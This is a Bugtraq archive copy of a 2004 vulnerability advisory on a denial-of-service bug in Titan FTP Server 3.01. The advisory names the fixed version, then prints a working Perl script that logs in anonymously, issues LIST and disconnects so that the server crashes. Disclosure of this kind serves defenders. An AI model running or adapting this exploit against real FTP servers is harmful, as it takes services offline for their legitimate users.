Bugtraq mailing list archives
Titan FTP Server Aborted LIST DoS
From: Aviram Jenik <aviram () beyondsecurity com>
Date: Wed, 5 May 2004 15:51:23 +0300
Titan FTP Server Aborted LIST DoS ---------------------------------------------------- Article reference: http://www.securiteam.com/windowsntfocus/5RP0215CUU.html SUMMARY A security vulnerability exists in South River Technologies' Titan FTP Server. An attacker issuing a LIST command and disconnecting before the LIST command had the time to connect, will cause the program to try and access an invalid socket. This will result in the FTP service's crash (and in turn, no longer being able to service any additional users). DETAILS Vulnerable Systems: * Titan FTP Server version 3.01 build 163 Immune Systems: * Titan FTP Server version 3.10 build 169 Solution: To solve this issue upgrade to the latest version (3.10 build 169 or newer). Exploit: #!/usr/bin/perl # Test for Titan FTP server security vulnerability # # Orkut users? Come join the SecuriTeam community # http://www.orkut.com/Community.aspx?cmm=44441 # use IO::Socket; $host = "192.168.1.243"; my @combination; $combination[0] = "LIST \r\n"; for (my $i = 0; $combination[$i] ; $i++) { print "Combination: $1\n"; $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, PeerPort => "2112", ); unless ($remote) { die "cannot connect to ftp daemon on $host" } print "connected\n"; while (<$remote>) { print $_; if (/220 /) { last; } } $remote->autoflush(1); my $ftp = "USER anonymous\r\n"; print $remote $ftp; print $ftp; while (<$remote>) { print $_; if (/331 /) { last; } } $ftp = "PASS a\@b.com\r\n"; print $remote $ftp; print $ftp; while (<$remote>) { print $_; if (/230 /) { last; } } $ftp = $combination[$i]; print $remote $ftp; print $ftp; while (<$remote>) { print $_; if (/150 /) { last; } close $remote; } ADDITIONAL INFORMATION SecurITeam would like to thank <mailto:storm () securiteam com> STORM for finding this vulnerability. Regards, Aviram Jenik Beyond Security Ltd. http://www.BeyondSecurity.com http://www.SecuriTeam.com The First Integrated Network and Web Application Vulnerability Scanner: http://www.beyondsecurity.com/webscan-wp.pdf ==================== ==================== DISCLAIMER: The information in this bulletin is provided "AS IS" without warranty of any kind. In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
Current thread:
- Titan FTP Server Aborted LIST DoS Aviram Jenik (May 05)
- Re: Titan FTP Server Aborted LIST DoS Gene Ken (May 07)
- Re: Titan FTP Server Aborted LIST DoS Noam Rathaus (May 07)
- Re: Titan FTP Server Aborted LIST DoS Gene Ken (May 07)